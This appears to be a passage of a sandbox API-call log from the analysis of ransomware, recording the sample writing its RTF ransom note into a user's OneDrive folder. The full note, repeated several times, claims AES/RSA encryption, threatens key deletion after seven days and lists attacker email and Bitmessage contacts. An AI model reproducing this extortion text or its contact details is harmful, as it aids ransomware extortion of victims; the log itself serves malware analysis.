the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¨C\x0e\x08¸´ês©&\n1\x02#ý{z£d-º°\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0300.129] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.129] CloseHandle (hObject=0x2d4) returned 1 [0300.129] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\te\\#readme_eman#.rtf")) returned 0xffffffff [0300.129] GetLastError () returned 0x2 [0300.129] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\te\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR 